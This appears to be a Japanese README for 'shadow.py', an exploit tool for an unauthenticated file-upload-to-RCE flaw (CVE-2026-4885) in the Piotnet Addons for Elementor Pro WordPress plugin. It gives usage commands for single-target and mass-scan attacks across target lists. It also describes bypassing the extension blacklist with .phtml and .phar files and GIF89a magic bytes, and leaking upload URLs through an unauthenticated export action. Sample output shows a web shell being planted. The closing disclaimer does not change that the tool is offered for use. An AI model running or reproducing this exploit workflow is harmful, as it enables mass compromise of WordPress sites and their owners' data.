
Piotnet Addons for Elementor Pro <= 7.1.70 - 認証なし任意ファイルアップロード → RCE
Piotnet Addons for Elementor Pro <= 7.1.70 - 未認証の任意ファイルアップロード → RCE
WordPress用プラグイン Piotnet Addons for Elementor Pro は、pafe_ajax_form_builder 関数においてバージョン 7.1.70 までの全バージョンでファイルタイプのバリデーションが欠如しているため、任意ファイルアップロードの脆弱性があります。このプラグインは 不完全な拡張子ブラックリスト を使用しており、php、phpt、php5、php7、exe 拡張子のみをブロックし、.phar や .phtml などの危険な拡張子は自由にアップロードできてしまいます。
これにより、未認証の攻撃者 が対象サイトのサーバー上に任意のPHPファイルをアップロードし、リモートコード実行(RCE) を引き起こすことが可能になります。
注: この脆弱性を悪用するには、Piotnetフォームにファイルフィールドが追加されている必要があります。
~ CVSSスコア : 9.8 (クリティカル)
~ CVSSベクトル : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ 影響を受けるバージョン : <= 7.1.70
~ パッチ : 利用可能なパッチなし
~ 公開日 : May 18, 2026
pafe_ajax_form_builder AJAXハンドラーは、適切なバリデーションを行わずにファイルアップロードを受け入れます。
// 不完全なブラックリスト — ブロックするのは次のもののみ:
$blocked = ['php', 'phpt', 'php5', 'php7', 'exe'];
// .phtml、.phar、.shtml などは自由に通過します ✓
アップロードパスは、未認証の pafe_export_database AJAXアクション経由で漏洩する可能性があります → CSVエクスポートに完全なファイルURLが含まれます。
対話型メニュー(デフォルト):
python3 shadow.py
╾──── MENU ────╼
1 ▶ one target
2 ▶ mass scan
3 ▶ exit
[1/2/3] :
単一ターゲット(CLI):
python3 shadow.py -u https://target.com
python3 shadow.py -u https://target.com -s shell.phtml
複数ターゲット(CLI):
python3 shadow.py -f targets.txt -t 20
python3 shadow.py -f targets.txt -t 20 -s shell.phtml
オプション :
-u, --url ターゲットURL
-f, --file ターゲットURLのファイル(1行につき1つ)
-s, --shell カスタムPHPシェルファイル(GIF89a自動付加)
-t, --threads マスモードの同時スレッド数(デフォルト: 5)
-h, --help ヘルプを表示
form_id、post_id、field_name の自動検出pafe_export_database 経由のURL漏洩(認証不要、nonce不要)shell.txt)シェルファイルをローカルで準備します(例: shadow.phtml)— GIF89aマジックバイトは不足している場合 自動的に付加されます。
ブロックされる拡張子:
.php.phpt.php5.php7.exe代わりに使用する拡張子:
.phtml.phar.shtml.php8など
╔══════════════════════════════════════════════════════════╗
║ ║
║ ♡ CVE-2026-4885 ║
║ Piotnet Addons for Elementor Pro <= 7.1.70 ║
║ Unauthenticated File Upload → RCE ║
║ ║
║ by Shadow & Friska ♡ ║
║ ║
╚══════════════════════════════════════════════════════════╝
╾──── VERSION ────╼
♡ v7.1.67 <= 7.1.70 — VULNERABLE
╾──── RECON ────╼
◆ scanning 46 pages (parallel)...
♡ [PIOTNET] https://target.com/contact
post_id=9 | form_id=72071c0
◆ using : https://target.com/contact
╾──── EXPLOIT ────╼
◆ post_id=9 | form_id=72071c0 | field=file
▶ trying .phtml ...
♡ uploaded (.phtml)
♡ URL leak : https://target.com/wp-content/uploads/piotnet-addons-for-elementor/shadow-xxx.phtml
╔══════════════════════════════════════════════════════════╗
║ ★ SHELL UPLOADED (.phtml) ║
║ ║
║ ◆ shell : https://target.com/wp-content/... ║
╚══════════════════════════════════════════════════════════╝
pip install httpx
このツールは教育目的および許可されたセキュリティテスト目的のみのものです。
自分が所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は違法です。作成者は、このツールの誤用やそれによって生じた損害について一切の責任を負いません。